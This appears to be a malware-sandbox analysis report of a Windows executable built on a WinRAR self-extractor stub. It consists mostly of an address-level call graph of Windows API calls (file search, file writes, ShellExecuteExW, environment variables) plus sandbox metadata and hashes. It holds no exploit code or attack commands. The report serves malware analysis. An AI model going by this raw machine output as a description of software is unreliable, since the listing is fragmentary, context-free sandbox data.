b282bb 24762->24763 24931 b29f42 24762->24931 24766 b282f2 24763->24766 24796 b21a04 24763->24796 24927 b21692 24766->24927 24769 b28389 24815 b28430 24769->24815 24772 b283e8 24823 b21f6d 24772->24823 24775 b282ee 24775->24766 24775->24769 24779 b2a56d 7 API calls 24775->24779 24935 b2c0c5 CompareStringW _wcslen 24775->24935 24777 b283f3 24777->24766 24827 b23b2d 24777->24827 24839 b2848e 24777->24839 24779->24775 24782 b2a582 24781->24782 24783 b2a5b0 24782->24783 25191 b2a69b 24782->25191 24783->24718 24785 b2a592 24785->24783 24786 b2a597 FindClose 24785->24786 24786->24783 24787->24721 24789 b213e1 __EH_prolog 24788->24789 24790 b2ce40 8 API calls 24789->24790 24791 b21419 24790->24791 24792 b3eb38 8 API calls 24791->24792 24795 b21474 __cftof 24791->24795 24793 b21461 24792->24793 24793->24795 24936 b2b505 24793->24936 24795->24762 24797 b21a0e __EH_prolog 24796->24797 24799 b21a61 24797->24799 24804 b21b9b 24797->24804 24952 b213ba 24797->24952 24801 b21bc7 24799->24801 24799->24804 24805 b21bd4 24799->24805 24955 b2138b 74 API calls 24801->24955 24803 b23b2d 101 API calls 24807 b21c12 24803->24807 24804->24775 24805->24803 24805->24804 24806 b21c5a 24806->24804 24810 b21c8d 24806->24810 24956 b2138b 74 API calls 24806->24956 24807->24806 24809 b23b2d 101 API calls 24807->24809 24809->24807 24810->24804 24814 b29e80 79 API calls 24810->24814 24811 b23b2d 101 API calls 24812 b21cde 24811->24812 24812->24804 24812->24811 24813 b29e80 79 API calls 24813->24799 24814->24812 24974 b2cf3d 24815->24974 24817 b28440 24978 b313d2 GetSystemTime SystemTimeToFileTime 24817->24978 24819 b283a3 24819->24772 24820 b31b66 24819->24820 24979 b3de6b 24820->24979 24824 b21f72 __EH_prolog 24823->24824 24826 b21fa6 24824->24826 24987 b219af 24824->24987 24826->24777 24828 b23b39 24827->24828 24829 b23b3d 24827->24829 24828->24777 24838 b29e80 79 API calls 24829->24838 24830 b23b4f 24831 b23b6a 24830->24831 24832 b23b78 24830->24832 24833 b23baa 24831->24833 25117 b232f7 89 API calls 2 library calls 24831->25117 25118 b2286b 101 API calls 3 library calls 24832->25118 24833->24777 24836 b23b76 24836->24833 25119 b220d7 74 API calls 24836->25119 24838->24830 24840 b28498 __EH_prolog 24839->24840 24843 b284d5 24840->24843 24854 b28513 24840->24854 25144 b38c8d 103 API calls 24840->25144 24842 b284f5 24844 b284fa 24842->24844 24845 b2851c 24842->24845 24843->24842 24848 b2857a 24843->24848 24843->24854 24844->24854 25145 b27a0d 152 API calls 24844->25145 24845->24854 25146 b38c8d 103 API calls 24845->25146 24848->24854 25120 b25d1a 24848->25120 24850 b28605 24850->24854 25126 b28167 24850->25126 24853 b28797 24855 b2a56d 7 API calls 24853->24855 24856 b28802 24853->24856 24854->24777 24855->24856 25132 b27c0d 24856->25132 24858 b2d051 82 API calls 24864 b2885d 24858->24864 24859 b28a5f 24865 b28ab6 24859->24865 24877 b28a6a 24859->24877 24860 b28992 24860->24859 24867 b289e1 24860->24867 24861 b2898b 25149 b22021 74 API calls 24861->25149 24864->24854 24864->24858 24864->24860 24864->24861 25147 b28117 84 API calls 24864->25147 25148 b22021 74 API calls 24864->25148 24870 b28a4c 24865->24870 25152 b27fc0 97 API calls 24865->25152 24866 b28ab4 24871 b2959a 80 API calls 24866->24871 24868 b28b14 24867->24868 24867->24870 24872 b2a231 3 API calls 24867->24872 24886 b28b82 24868->24886 24916 b29105 24868->24916 25153 b298bc 24868->25153 24869 b2959a 80 API calls 24869->24854 24870->24866 24870->24868 24871->24854 24874 b28a19 24872->24874 24874->24870 25150 b292a3 97 API calls 24874->25150 24875 b2ab1a 8 API calls 24878 b28bd1 24875->24878 24877->24866 25151 b27db2 101 API calls 24877->25151 24881 b2ab1a 8 API calls 24878->24881 24898 b28be7 24881->24898 24884 b28b70 25157 b26e98 77 API calls 24884->25157 24886->24875 24887 b28cbc 24888 b28e40 24887->24888 24889 b28d18 24887->24889 24891 b28e52 24888->24891 24892 b28e66 24888->24892 24912 b28d49 24888->24912 24890 b28d8a 24889->24890 24893 b28d28 24889->24893 24900 b28167 19 API calls 24890->24900 24894 b29215 123 API calls 24891->24894 24895 b33377 75 API calls 24892->24895 24896 b28d6e 24893->24896 24904 b28d37 24893->24904 24894->24912 24897 b28e7f 24895->24897 24896->24912 25160 b277b8 111 API calls 24896->25160 25163 b33020 123 API calls 24897->25163 24898->24887 24899 b28c93 24898->24899 24907 b2981a 79 API calls 24898->24907 24899->24887 25158 b29a3c 82 API calls 24899->25158 24905 b28dbd 24900->24905 25159 b22021 74 API calls 24904->25159 24908 b28de6 24905->24908 24909 b28df5 24905->24909 24905->24912 24907->24899 25161 b27542 85 API calls 24908->25161 25162 b29155 93 API calls __EH_prolog 24909->25162 24914 b28f85 24912->24914 25164 b22021 74 API calls 24912->25164 24915 b29090 24914->24915 24914->24916 24917 b2903e 24914->24917 25138 b29f09 SetEndOfFile 24914->25138 24915->24916 24918 b2a4ed 3 API calls 24915->24918 24916->24869 25139 b29da2 24917->25139 24919 b290eb 24918->24919 24919->24916 25165 b22021 74 API calls 24919->25165 24922 b29085 24923 b29620 77 API calls 24922->24923 24923->24915 24925 b290fb 25166 b26dcb 76 API calls 24925->25166 24928 b216a4 24927->24928 25182 b2cee1 24928->25182 24932 b29f59 24931->24932 24933 b29f63 24932->24933 25190 b26d0c 78 API calls 24932->25190 24933->24763 24935->24775 24937 b2b50f __EH_prolog 24936->24937 24942 b2f1d0 82 API calls 24937->24942 24939 b2b521 24943 b2b61e 24939->24943 24942->24939 24944 b2b630 __cftof 24943->24944 24947 b310dc 24944->24947 24950 b3109e GetCurrentProcess GetProcessAffinityMask 24947->24950 24951 b2b597 24950->24951 24951->24795 24957 b21732 24952->24957 24954 b213d6 24954->24813 24955->24804 24956->24810 24959 b21748 24957->24959 24969 b217a0 __InternalCxxFrameHandler 24957->24969 24958 b21771 24961 b217c7 24958->24961 24966 b2178d ___std_exception_copy 24958->24966 24959->24958 24970 b26c36 76 API calls __vswprintf_c_l 24959->24970 24963 b43e3e 22 API calls 24961->24963 24962 b21767 24971 b26ca7 75 API calls 24962->24971 24965 b217ce 24963->24965 24965->24969 24973 b26ca7 75 API calls 24965->24973 24966->24969 24972 b26ca7 75 API calls 24966->24972 24969->24954 24970->24962 24971->24958 24972->24969 24973->24969 24975 b2cf4d 24974->24975 24977 b2cf54 24974->24977 24976 b2981a 79 API calls 24975->24976 24976->24977 24977->24817 24978->24819 24980 b3de78 24979->24980 24981 b2e617 53 API calls 24980->24981 24982 b3de9b 24981->24982 24983 b24092 _swprintf 51 API calls 24982->24983 24984 b3dead 24983->24984 24985 b3d4d4 16 API calls 24984->24985 24986 b31b7c 24985->24986 24986->24772 24988 b219bf 24987->24988 24990 b219bb 24987->24990 24991 b218f6 24988->24991 24990->24826 24992 b21908 24991->24992 24993 b21945 24991->24993 24994 b23b2d 101 API calls 24992->24994 24999 b23fa3 24993->24999 24995 b21928 24994->24995 24995->24990 25003 b23fac 24999->25003 25000 b23b2d 101 API calls 25000->25003 25001 b21966 25001->24995 25004 b21e50 25001->25004 25003->25000 25003->25001 25016 b30e08 25003->25016 25005 b21e5a __EH_prolog 25004->25005 25024 b23bba 25005->25024 25007 b21e84 25008 b21732 78 API calls 25007->25008 25010 b21f0b 25007->25010 25009 b21e9b 25008->25009 25052 b218a9 78 API calls 25009->25052 25010->24995 25012 b21eb3 25014 b21ebf _wcslen 25012->25014 25053 b31b84 MultiByteToWideChar 25012->25053 25054 b218a9 78 API calls 25014->25054 25017 b30e0f 25016->25017 25018 b30e2a 25017->25018 25022 b26c31 RaiseException CallUnexpected 25017->25022 25020 b30e3b SetThreadExecutionState 25018->25020 25023 b26c31 RaiseException CallUnexpected 25018->25023 25020->25003 25022->25018 25023->25020 25025 b23bc4 __EH_prolog 25024->25025 25026 b23bf6 25025->25026 25027 b23bda 25025->25027 25029 b23e51 25026->25029 25032 b23c22 25026->25032 25080 b2138b 74 API calls 25027->25080 25097 b2138b 74 API calls 25029->25097 25031 b23be5 25031->25007 25032->25031 25055 b33377 25032->25055 25034 b23ca3 25035 b23d2e 25034->25035 25051 b23c9a 25034->25051 25083 b2d051 25034->25083 25065 b2ab1a 25035->25065 25036 b23c9f 25036->25034 25082 b220bd 78 API calls 25036->25082 25038 b23c71 25038->25034 25038->25036 25039 b23c8f 25038->25039 25081 b2138b 74 API calls 25039->25081 25043 b23d41 25045 b23dd7 25043->25045 25046 b23dc7 25043->25046 25089 b33020 123 API calls 25045->25089 25069 b29215 25046->25069 25049 b23dd5 25049->25051 25090 b22021 74 API calls 25049->25090 25091 b32297 25051->25091 25052->25012 25053->25014 25054->25010 25056 b3338c 25055->25056 25058 b33396 ___std_exception_copy 25055->25058 25098 b26ca7 75 API calls 25056->25098 25059 b3341c 25058->25059 25060 b334c6 25058->25060 25063 b33440 __cftof 25058->25063 25099 b332aa 75 API calls 3 library calls 25059->25099 25100 b4238d RaiseException 25060->25100 25063->25038 25064 b334f2 25066 b2ab28 25065->25066 25068 b2ab32 25065->25068 25067 b3eb38 8 API calls 25066->25067 25067->25068 25068->25043 25070 b2921f __EH_prolog 25069->25070 25101 b27c64 25070->25101 25073 b213ba 78 API calls 25074 b29231 25073->25074 25104 b2d114 25074->25104 25076 b29243 25077 b2928a 25076->25077 25079 b2d114 118 API calls 25076->25079 25113 b2d300 97 API calls __InternalCxxFrameHandler 25076->25113 25077->25049 25079->25076 25080->25031 25081->25051 25082->25034 25084 b2d072 25083->25084 25085 b2d084 25083->25085 25114 b2603a 82 API calls 25084->25114 25115 b2603a 82 API calls 25085->25115 25088 b2d07c 25088->25035 25089->25049 25090->25051 25093 b322a1 25091->25093 25092 b322ba 25116 b30eed 86 API calls 25092->25116 25093->25092 25096 b322ce 25093->25096 25095 b322c1 25095->25096 25097->25031 25098->25058 25099->25063 25100->25064 25102 b2b146 GetVersionExW 25101->25102 25103 b27c69 25102->25103 25103->25073 25111 b2d12a __InternalCxxFrameHandler 25104->25111 25105 b2d29a 25106 b2d0cb 6 API calls 25105->25106 25107 b2d2ce 25105->25107 25106->25107 25108 b30e08 SetThreadExecutionState RaiseException 25107->25108 25110 b2d291 25108->25110 25109 b38c8d 103 API calls 25109->25111 25110->25076 25111->25105 25111->25109 25111->25110 25112 b2ac05 91 API calls 25111->25112 25112->25111 25113->25076 25114->25088 25115->25088 25116->25095 25117->24836 25118->24836 25119->24833 25121 b25d2a 25120->25121 25167 b25c4b 25121->25167 25123 b25d5d 25125 b25d95 25123->25125 25172 b2b1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 25123->25172 25125->24850 25127 b28186 25126->25127 25128 b28232 25127->25128 25179 b2be5e 19 API calls __InternalCxxFrameHandler 25127->25179 25178 b31fac CharUpperW 25128->25178 25131 b2823b 25131->24853 25133 b27c22 25132->25133 25134 b27c5a 25133->25134 25180 b26e7a 74 API calls 25133->25180 25134->24864 25136 b27c52 25181 b2138b 74 API calls 25136->25181 25138->24917 25140 b29db3 25139->25140 25142 b29dc2 25139->25142 25141 b29db9 FlushFileBuffers 25140->25141 25140->25142 25141->25142 25143 b29e3f SetFileTime 25142->25143 25143->24922 25144->24843 25145->24854 25146->24854 25147->24864 25148->24864 25149->24860 25150->24870 25151->24866 25152->24870 25154 b28b5a 25153->25154 25155 b298c5 GetFileType 25153->25155 25154->24886 25156 b22021 74 API calls 25154->25156 25155->25154 25156->24884 25157->24886 25158->24887 25159->24912 25160->24912 25161->24912 25162->24912 25163->24912 25164->24914 25165->24925 25166->24916 25173 b25b48 25167->25173 25170 b25b48 2 API calls 25171 b25c6c 25170->25171 25171->25123 25172->25123 25176 b25b52 25173->25176 25174 b25c3a 25174->25170 25174->25171 25176->25174 25177 b2b1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 25176->25177 25177->25176 25178->25131 25179->25128 25180->25136 25181->25134 25183 b2cef2 25182->25183 25188 b2a99e 86 API calls 25183->25188 25185 b2cf24 25189 b2a99e 86 API calls 25185->25189 25187 b2cf2f 25188->25185 25189->25187 25190->24933 25192 b2a6a8 25191->25192 25193 b2a6c1 FindFirstFileW 25192->25193 25194 b2a727 FindNextFileW 25192->25194 25195 b2a6d0 25193->25195 25201 b2a709 25193->25201 25196 b2a732 GetLastError 25194->25196 25194->25201 25197 b2bb03 GetCurrentDirectoryW 25195->25197 25196->25201 25198 b2a6e0 25197->25198 25199 b2a6e4 FindFirstFileW 25198->25199 25200 b2a6fe GetLastError 25198->25200 25199->25200 25199->25201 25200->25201 25201->24785 25202->24591 25203->24595 25204->24595 25205->24598 25206->24606 25208 b29f42 78 API calls 25207->25208 25209 b21fe8 25208->25209 25210 b21a04 101 API calls 25209->25210 25213 b22005 25209->25213 25211 b21ff5 25210->25211 25211->25213 25214 b2138b 74 API calls 25211->25214 25213->24614 25213->24615 25214->25213 25216 b3b583 GetMessageW 25215->25216 25217 b3b5bc GetDlgItem 25215->25217 25218 b3b599 IsDialogMessageW 25216->25218 25219 b3b5a8 TranslateMessage DispatchMessageW 25216->25219 25217->24625 25217->24626 25218->25217 25218->25219 25219->25217 25220 b213e1 84 API calls 2 library calls 25345 b394e0 GetClientRect 25378 b321e0 26 API calls std::bad_exception::bad_exception 25396 b3f2e0 46 API calls __RTC_Initialize 25221 b3eae7 25222 b3eaf1 25221->25222 25223 b3e85d ___delayLoadHelper2@8 14 API calls 25222->25223 25224 b3eafe 25223->25224 25346 b3f4e7 29 API calls _abort 25397 b4bee0 GetCommandLineA GetCommandLineW 25379 b2f1e8 FreeLibrary 25347 b3f4d3 20 API calls 25232 b3e1d1 14 API calls ___delayLoadHelper2@8 25234 b3e2d7 25235 b3e1db 25234->25235 25236 b3e85d ___delayLoadHelper2@8 14 API calls 25235->25236 25236->25235 25416 b4a3d0 21 API calls 2 library calls 25417 b52bd0 VariantClear 25239 b210d5 25244 b25abd 25239->25244 25245 b25ac7 __EH_prolog 25244->25245 25246 b2b505 84 API calls 25245->25246 25247 b25ad3 25246->25247 25251 b25cac GetCurrentProcess GetProcessAffinityMask 25247->25251 25399 b40ada 51 API calls 2 library calls 25316 b3dec2 25317 b3decf 25316->25317 25318 b2e617 53 API calls 25317->25318 25319 b3dedc 25318->25319 25320 b24092 _swprintf 51 API calls 25319->25320 25321 b3def1 SetDlgItemTextW 25320->25321 25322 b3b568 5 API calls 25321->25322 25323 b3df0e 25322->25323 25381 b3b5c0 100 API calls 25418 b377c0 118 API calls 25419 b3ffc0 RaiseException _com_error::_com_error CallUnexpected 25400 b362ca 123 API calls __InternalCxxFrameHandler 25382 b3f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25421 b3ff30 LocalFree 24141 b4bb30 24142 b4bb39 24141->24142 24143 b4bb42 24141->24143 24145 b4ba27 24142->24145 24146 b497e5 _abort 38 API calls 24145->24146 24147 b4ba34 24146->24147 24165 b4bb4e 24147->24165 24149 b4ba3c 24174 b4b7bb 24149->24174 24154 b4ba96 24157 b48dcc _free 20 API calls 24154->24157 24159 b4ba53 24157->24159 24158 b4ba91 24198 b491a8 20 API calls __dosmaperr 24158->24198 24159->24143 24161 b4bada 24161->24154 24199 b4b691 26 API calls 24161->24199 24162 b4baae 24162->24161 24163 b48dcc _free 20 API calls 24162->24163 24163->24161 24166 b4bb5a ___scrt_is_nonwritable_in_current_image 24165->24166 24167 b497e5 _abort 38 API calls 24166->24167 24172 b4bb64 24167->24172 24169 b4bbe8 _abort 24169->24149 24172->24169 24173 b48dcc _free 20 API calls 24172->24173 24200 b48d24 38 API calls _abort 24172->24200 24201 b4ac31 EnterCriticalSection 24172->24201 24202 b4bbdf LeaveCriticalSection _abort 24172->24202 24173->24172 24175 b44636 __cftof 38 API calls 24174->24175 24176 b4b7cd 24175->24176 24177 b4b7dc GetOEMCP 24176->24177 24178 b4b7ee 24176->24178 24179 b4b805 24177->24179 24178->24179 24180 b4b7f3 GetACP 24178->24180 24179->24159 24181 b48e06 24179->24181 24180->24179 24182 b48e44 24181->24182 24186 b48e14 _abort 24181->24186 24204 b491a8 20 API calls __dosmaperr 24182->24204 24183 b48e2f RtlAllocateHeap 24185 b48e42 24183->24185 24183->24186 24185->24154 24188 b4bbf0 24185->24188 24186->24182 24186->24183 24203 b47a5e 7 API calls 2 library calls 24186->24203 24189 b4b7bb 40 API calls 24188->24189 24190 b4bc0f 24189->24190 24193 b4bc60 IsValidCodePage 24190->24193 24195 b4bc16 24190->24195 24196 b4bc85 __cftof 24190->24196 24191 b3fbbc _ValidateLocalCookies 5 API calls 24192 b4ba89 24191->24192 24192->24158 24192->24162 24194 b4bc72 GetCPInfo 24193->24194 24193->24195 24194->24195 24194->24196 24195->24191 24205 b4b893 GetCPInfo 24196->24205 24198->24154 24199->24154 24201->24172 24202->24172 24203->24186 24204->24185 24211 b4b8cd 24205->24211 24214 b4b977 24205->24214 24207 b3fbbc _ValidateLocalCookies 5 API calls 24210 b4ba23 24207->24210 24210->24195 24215 b4c988 24211->24215 24213 b4ab78 __vsnwprintf_l 43 API calls 24213->24214 24214->24207 24216 b44636 __cftof 38 API calls 24215->24216 24217 b4c9a8 MultiByteToWideChar 24216->24217 24219 b4c9e6 24217->24219 24220 b4ca7e 24217->24220 24224 b48e06 __vsnwprintf_l 21 API calls 24219->24224 24225 b4ca07 __cftof __vsnwprintf_l 24219->24225 24221 b3fbbc _ValidateLocalCookies 5 API calls 24220->24221 24222 b4b92e 24221->24222 24229 b4ab78 24222->24229 24223 b4ca78 24234 b4abc3 20 API calls _free 24223->24234 24224->24225 24225->24223 24227 b4ca4c MultiByteToWideChar 24225->24227 24227->24223 24228 b4ca68 GetStringTypeW 24227->24228 24228->24223 24230 b44636 __cftof 38 API calls 24229->24230 24231 b4ab8b 24230->24231 24235 b4a95b 24231->24235 24234->24220 24236 b4a976 __vsnwprintf_l 24235->24236 24237 b4a99c MultiByteToWideChar 24236->24237 24238 b4a9c6 24237->24238 24239 b4ab50 24237->24239 24242 b48e06 __vsnwprintf_l 21 API calls 24238->24242 24244 b4a9e7 __vsnwprintf_l 24238->24244 24240 b3fbbc _ValidateLocalCookies 5 API calls 24239->24240 24241 b4ab63 24240->24241 24241->24213 24242->24244 24243 b4aa30 MultiByteToWideChar 24245 b4aa49 24243->24245 24258 b4aa9c 24243->24258 24244->24243 24244->24258 24262 b4af6c 24245->24262 24249 b4aaab 24251 b4aacc __vsnwprintf_l 24249->24251 24252 b48e06 __vsnwprintf_l 21 API calls 24249->24252 24250 b4aa73 24254 b4af6c __vsnwprintf_l 11 API calls 24250->24254 24250->24258 24253 b4ab41 24251->24253 24255 b4af6c __vsnwprintf_l 11 API calls 24251->24255 24252->24251 24270 b4abc3 20 API calls _free 24253->24270 24254->24258 24257 b4ab20 24255->24257 24257->24253 24259 b4ab2f WideCharToMultiByte 24257->24259 24271 b4abc3 20 API calls _free 24258->24271 24259->24253 24260 b4ab6f 24259->24260 24272 b4abc3 20 API calls _free 24260->24272 24263 b4ac98 _abort 5 API calls 24262->24263 24264 b4af93 24263->24264 24267 b4af9c 24264->24267 24273 b4aff4 10 API calls 3 library calls 24264->24273 24266 b4afdc LCMapStringW 24266->24267 24268 b3fbbc _ValidateLocalCookies 5 API calls 24267->24268 24269 b4aa60 24268->24269 24269->24249 24269->24250 24269->24258 24270->24258 24271->24239 24272->24258 24273->24266 25350 b4c030 GetProcessHeap 25402 b3c220 93 API calls _swprintf 25352 b4f421 21 API calls __vsnwprintf_l 25383 b4b4ae 27 API calls _ValidateLocalCookies 25353 b21025 29 API calls 25424 b21710 86 API calls 25384 b3ad10 73 API calls 25357 b3a400 GdipDisposeImage GdipFree 25403 b3d600 70 API calls 25358 b46000 QueryPerformanceFrequency QueryPerformanceCounter 25387 b42900 6 API calls 4 library calls 25404 b4f200 51 API calls 25426 b4a700 21 API calls 25427 b21f72 128 API calls __EH_prolog 25360 b3a070 10 API calls 25405 b3b270 99 API calls 24323 b29a74 24326 b29a7e 24323->24326 24324 b29b9d SetFilePointer 24325 b29bb6 GetLastError 24324->24325 24329 b29ab1 24324->24329 24325->24329 24326->24324 24328 b29b79 24326->24328 24326->24329 24330 b2981a 24326->24330 24328->24324 24331 b29833 24330->24331 24333 b29e80 79 API calls 24331->24333 24332 b29865 24332->24328 24333->24332 25362 b21075 84 API calls 24334 b29f7a 24335 b29f8f 24334->24335 24340 b29f88 24334->24340 24336 b29f9c GetStdHandle 24335->24336 24341 b29fab 24335->24341 24336->24341 24337 b2a003 WriteFile 24337->24341 24338 b29fd4 WriteFile 24339 b29fcf 24338->24339 24338->24341 24339->24338 24339->24341 24341->24337 24341->24338 24341->24339 24341->24340 24343 b2a095 24341->24343 24345 b26baa 78 API calls 24341->24345 24346 b26e98 77 API calls 24343->24346 24345->24341 24346->24340 25364 b3c793 107 API calls 4 library calls 25429 b47f6e 52 API calls 2 library calls 25406 b48268 55 API calls _free 25237 b4c051 31 API calls _ValidateLocalCookies 25365 b3e455 14 API calls ___delayLoadHelper2@8 25252 b3cd58 25254 b3ce22 25252->25254 25259 b3cd7b 25252->25259 25253 b3b314 ExpandEnvironmentStringsW 25264 b3c793 _wcslen _wcsrchr 25253->25264 25254->25264 25280 b3d78f 25254->25280 25256 b3d40a 25258 b31fbb CompareStringW 25258->25259 25259->25254 25259->25258 25260 b3ca67 SetWindowTextW 25260->25264 25263 b43e3e 22 API calls 25263->25264 25264->25253 25264->25256 25264->25260 25264->25263 25266 b3c855 SetFileAttributesW 25264->25266 25271 b3cc31 GetDlgItem SetWindowTextW SendMessageW 25264->25271 25274 b3cc71 SendMessageW 25264->25274 25279 b31fbb CompareStringW 25264->25279 25304 b3a64d GetCurrentDirectoryW 25264->25304 25306 b2a5d1 6 API calls 25264->25306 25307 b2a55a FindClose 25264->25307 25308 b3b48e 76 API calls 2 library calls 25264->25308 25267 b3c90f GetFileAttributesW 25266->25267 25278 b3c86f __cftof _wcslen 25266->25278 25267->25264 25269 b3c921 DeleteFileW 25267->25269 25269->25264 25272 b3c932 25269->25272 25271->25264 25273 b24092 _swprintf 51 API calls 25272->25273 25275 b3c952 GetFileAttributesW 25273->25275 25274->25264 25275->25272 25276 b3c967 MoveFileW 25275->25276 25276->25264 25277 b3c97f MoveFileExW 25276->25277 25277->25264 25278->25264 25278->25267 25305 b2b991 51 API calls 2 library calls 25278->25305 25279->25264 25281 b3d799 __cftof _wcslen 25280->25281 25282 b3d8a5 25281->25282 25283 b3d9c0 25281->25283 25284 b3d9e7 25281->25284 25309 b31fbb CompareStringW 25281->25309 25286 b2a231 3 API calls 25282->25286 25283->25284 25287 b3d9de ShowWindow 25283->25287 25284->25264 25288 b3d8ba 25286->25288 25287->25284 25289 b3d8d9 ShellExecuteExW 25288->25289 25310 b2b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 25288->25310 25289->25284 25296 b3d8ec 25289->25296 25291 b3d8d1 25291->25289 25292 b3d925 25311 b3dc3b 6 API calls 25292->25311 25293 b3d97b CloseHandle 25294 b3d989 25293->25294 25295 b3d994 25293->25295 25312 b31fbb CompareStringW 25294->25312 25295->25283 25296->25292 25296->25293 25298 b3d91b ShowWindow 25296->25298 25298->25292 25300 b3d93d 25300->25293 25301 b3d950 GetExitCodeProcess 25300->25301 25301->25293 25302 b3d963 25301->25302 25302->25293 25304->25264 25305->25278 25306->25264 25307->25264 25308->25264 25309->25282 25310->25291 25311->25300 25312->25295 25366 b3a440 GdipCloneImage GdipAlloc 25408 b43a40 5 API calls _ValidateLocalCookies 25430 b51f40 CloseHandle

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 00B3DF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195filesleeptimeCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B30863: GetModuleHandleW.KERNEL32(kernel32), ref: 00B3087C
                                                                                                                                                                            • Part of subcall function 00B30863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00B3088E
                                                                                                                                                                            • Part of subcall function 00B30863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00B308BF
                                                                                                                                                                            • Part of subcall function 00B3A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00B3A655
                                                                                                                                                                            • Part of subcall function 00B3AC16: OleInitialize.OLE32(00000000), ref: 00B3AC2F
                                                                                                                                                                            • Part of subcall function 00B3AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00B3AC66
                                                                                                                                                                            • Part of subcall function 00B3AC16: SHGetMalloc.SHELL32(00B68438), ref: 00B3AC70
                                                                                                                                                                          • GetCommandLineW.KERNEL32 ref: 00B3DF5C
                                                                                                                                                                          • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00B3DF83
                                                                                                                                                                          • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00B3DF94
                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 00B3DFCE
                                                                                                                                                                            • Part of subcall function 00B3DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00B3DBF4
                                                                                                                                                                            • Part of subcall function 00B3DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00B3DC30
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00B3DFD7
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,00B7EC90,00000800), ref: 00B3DFF2
                                                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(sfxname,00B7EC90), ref: 00B3DFFE
                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 00B3E009
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00B3E048
                                                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00B3E05A
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00B3E061
                                                                                                                                                                          • LoadIconW.USER32(00000000,00000064), ref: 00B3E078
                                                                                                                                                                          • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00B3E0C9
                                                                                                                                                                          • Sleep.KERNEL32(?), ref: 00B3E0F7
                                                                                                                                                                          • DeleteObject.GDI32 ref: 00B3E130
                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00B3E140
                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 00B3E183
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                                                                                          • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                                                                                          • API String ID: 3049964643-3743209390
                                                                                                                                                                          • Opcode ID: dcca4bc76207bfa8c6f7bc1681c09dfefe3f68b5e16adbe2273b5d8b5ebbfb1f
                                                                                                                                                                          • Instruction ID: 6ea7d9578835ee9d83628933a4e8b5b29e98e4a2f0ea6404c156c0ed193b6643
                                                                                                                                                                          • Opcode Fuzzy Hash: dcca4bc76207bfa8c6f7bc1681c09dfefe3f68b5e16adbe2273b5d8b5ebbfb1f
                                                                                                                                                                          • Instruction Fuzzy Hash: A361C271504345AFD320AB74AC59F2B7BE8EB48B41F1404EAF949A32E1DFB8D944C762
                                                                                                                                                                          Function 00B3A6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
